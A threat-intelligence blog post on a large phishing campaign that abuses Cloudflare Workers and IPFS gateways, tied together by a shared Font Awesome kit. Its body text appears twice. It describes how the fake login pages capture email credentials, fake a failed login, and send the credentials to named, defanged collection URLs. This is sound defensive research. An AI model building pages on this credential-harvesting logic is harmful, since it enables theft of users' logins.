One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare

One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare

Published on

Published on

Published on

Nov 7, 2024

Nov 7, 2024

Nov 7, 2024

Exposing Massive Phishing Scams Abusing Cloudflare Services
Exposing Massive Phishing Scams Abusing Cloudflare Services
Exposing Massive Phishing Scams Abusing Cloudflare Services
TABLE OF CONTENTS

Introduction 

At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.

What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.

In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.

What is Font Awesome?

Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)

In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.

The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location. 

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)

Phishing Activity Details

As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.

Below is a quick explantion of how threat actors can abuse these services:

  • IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.

  • Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).

We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.

ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.

Figure 3: Screenshot of HTML including font awesome and suspicious Javascript.

The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

Below is a brief breakdown of the code in Figure 4:

  1. The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.

  2. Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field. 

  3. An error message indicates login failure, incrementing the counter (count) variable to track login attempts.

  4. After two failed attempts, the page redirects the user to the official Adobe website (line 24).

  5. Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.

  6. Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php

*At the time of writing, the URL accepting the credentials is no longer responding.

weston1.html

Figure 5: Screenshot

Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.

Again, in Figure 5, identified by the arrows, are the Font Awesome script and a slightly more complex script are buried at the bottom of the page.

Figure 6: Snippet of Javascript code inside weston1.html

The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:

  1. The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.

  2. Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.

  3. The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.

biocareremedies[.]in/admin/em/mnx/

Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.

Figure 7: Screenshot of biocareremedies[.]in

The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.

Figure 8: Snippet of Javascript code for the spoofed LinkedIn page

A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.

We can easily navigate to this page in the browser.

Figure 9: Error message at next.php

Conclusion

The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.

Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.

TABLE OF CONTENTS

Introduction 

At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.

What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.

In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.

What is Font Awesome?

Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)

In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.

The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location. 

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)

Phishing Activity Details

As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.

Below is a quick explantion of how threat actors can abuse these services:

  • IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.

  • Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).

We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.

ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.

Figure 3: Screenshot of HTML including font awesome and suspicious Javascript.

The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

Below is a brief breakdown of the code in Figure 4:

  1. The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.

  2. Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field. 

  3. An error message indicates login failure, incrementing the counter (count) variable to track login attempts.

  4. After two failed attempts, the page redirects the user to the official Adobe website (line 24).

  5. Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.

  6. Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php

*At the time of writing, the URL accepting the credentials is no longer responding.

weston1.html

Figure 5: Screenshot

Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.

Again, in Figure 5, identified by the arrows, are the Font Awesome script and a slightly more complex script are buried at the bottom of the page.

Figure 6: Snippet of Javascript code inside weston1.html

The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:

  1. The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.

  2. Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.

  3. The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.

biocareremedies[.]in/admin/em/mnx/

Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.

Figure 7: Screenshot of biocareremedies[.]in

The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.

Figure 8: Snippet of Javascript code for the spoofed LinkedIn page

A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.

We can easily navigate to this page in the browser.

Figure 9: Error message at next.php

Conclusion

The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.

Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.

Related Posts:

Dec 20, 2024

Discover Hunt.io's 2024 highlights: major product launches, innovations like AttackCapture™, C2 Feed, and Hunt SQL, and a look ahead to 2025.

Dec 20, 2024

Discover Hunt.io's 2024 highlights: major product launches, innovations like AttackCapture™, C2 Feed, and Hunt SQL, and a look ahead to 2025.

Oyster’s Trail: Resurgence of Infrastructure Linked to Ransomware and Cybercrime Actors
Dec 12, 2024

Our latest analysis uncovers domains linked to the Oyster backdoor, revealing suspected Vanilla Tempest infrastructure and offering insights into server configuration patterns.

Oyster’s Trail: Resurgence of Infrastructure Linked to Ransomware and Cybercrime Actors
Dec 12, 2024

Our latest analysis uncovers domains linked to the Oyster backdoor, revealing suspected Vanilla Tempest infrastructure and offering insights into server configuration patterns.

“Million OK!!!!” and the Naver Facade: Tracking Recent Suspected Kimsuky Infrastructure
Dec 10, 2024

Learn how the 'Million OK!!!' HTTP response previously linked to Kimsuky has reappeared on new IPs and domains. This update provides the latest insights into evolving infrastructure, helping defenders stay informed on potential North Korean threat activity.

“Million OK!!!!” and the Naver Facade: Tracking Recent Suspected Kimsuky Infrastructure
Dec 10, 2024

Learn how the 'Million OK!!!' HTTP response previously linked to Kimsuky has reappeared on new IPs and domains. This update provides the latest insights into evolving infrastructure, helping defenders stay informed on potential North Korean threat activity.

MoqHao Leverages iCloud and VK in Campaign Targeting Apple IDs and Android Device
Dec 5, 2024

Discover how the MoqHao campaign leveraging iCloud and VK employs cross-platform tactics to steal credentials and distribute malicious APKs.

MoqHao Leverages iCloud and VK in Campaign Targeting Apple IDs and Android Device
Dec 5, 2024

Discover how the MoqHao campaign leveraging iCloud and VK employs cross-platform tactics to steal credentials and distribute malicious APKs.

Dec 20, 2024

Discover Hunt.io's 2024 highlights: major product launches, innovations like AttackCapture™, C2 Feed, and Hunt SQL, and a look ahead to 2025.

Oyster’s Trail: Resurgence of Infrastructure Linked to Ransomware and Cybercrime Actors
Dec 12, 2024

Our latest analysis uncovers domains linked to the Oyster backdoor, revealing suspected Vanilla Tempest infrastructure and offering insights into server configuration patterns.